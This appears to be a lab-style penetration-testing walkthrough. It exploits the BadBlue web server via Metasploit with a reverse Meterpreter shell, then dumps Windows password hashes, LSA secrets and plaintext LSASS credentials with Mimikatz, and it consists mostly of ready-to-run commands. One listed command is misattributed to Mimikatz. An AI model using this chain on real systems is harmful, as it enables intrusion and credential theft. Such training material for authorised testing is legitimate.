Dumping Hashes With Mimikatz

Mimikatz

• is a Windows post-exploitation tool written by Benjamin Delpy (). It allows for the extraction of clear-text passwords, hashes and Kerberos tickets from memory.

• The SAM (Security Account Manager) database, is a database file on Windows systems that stores hashed user passwords.

• Mimikatz can be used to extract hashes from the lsass.exe process memory where hashes are cached.

• We can utilize the pre-compiled mimikatz executable, alternatively, if we have access to a meterpreter session on a Windows target, we can utilize the inbuilt meterpreter extension Kiwi.

Attack Flow for Dumping Hashes With Mimikatz - Exploiting BadBlue

1. Initial Reconnaissance

Objective: Identify vulnerable services running on the target server.

Tool: nmap

Command:

nmap -sV -p 80 <target_ip>

Description: Scan port 80 to find the BadBlue service running on the server.

2. Exploit BadBlue Vulnerability

Objective: Exploit the vulnerability in the BadBlue service.

Tool: msfconsole

Module: badblue_passthru

Commands:

use exploit/windows/http/badblue_passthru
set RHOST <target_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_ip>
exploit

Description: Use the badblue_passthru module to exploit the BadBlue vulnerability and gain initial access.

3. Shell Migration

Objective: Migrate from a 32-bit process to a 64-bit process for better stability and functionality.

Tool: meterpreter

Command:

meterpreter > migrate -f 64

Description: Migrate the Meterpreter session to a 64-bit process.

4. Load Mimikatz and Extract Credentials

Objective: Use Mimikatz to gather credentials from the compromised server.

Tool: Mimikatz

Commands:

Load Mimikatz:

meterpreter > load kiwi

Retrieve All Credentials:

meterpreter > mimikatz_cmd -c "creds_all"

Dump SAM Database:

meterpreter > mimikatz_cmd -c "lsa_dump_sam"

Dump Secrets:

meterpreter > mimikatz_cmd -c "lsa_dump_secrets"

Description: Use Mimikatz to extract stored passwords, hashes, and secrets from the system.

5. Upload Mimikatz (If Not Already Present)

Objective: If Mimikatz is not on the target system, upload it.

Tool: meterpreter

Command:

meterpreter > upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe

Description: Upload the Mimikatz executable to the victim server.

6. Check User Privileges

Objective: Assess the level of access on the target system.

Tool: Mimikatz

Commands:

mimikatz.exe > privilege::debug

Description: Check for debugging privileges.

7. Dump Password Hashes

Objective: Extract password hashes from the system.

Tool: Mimikatz

Command:

mimikatz.exe > lsadump::sam

Description: Dump user password hashes from the SAM database.

8. Extract Plaintext Passwords

Objective: Retrieve plaintext passwords from memory.

Tool: Mimikatz

Command:

mimikatz.exe > sekurlsa::logonpasswords

Description: Extract plaintext passwords from LSASS process memory.

9. Additional Commands

To Dump Password Hashes:

mimikatz.exe > hashdump

Description: Extract password hashes from the system.

Hacker's Mantra:If you wanna know how not secure you are, just take a look around. Nothing’s secure. Nothing’s safe. I don’t hate technology, I don’t hate hackers, because that’s just what comes with it, without those hackers, we wouldn’t solve the problems we need to solve, especially security. - Fred Durst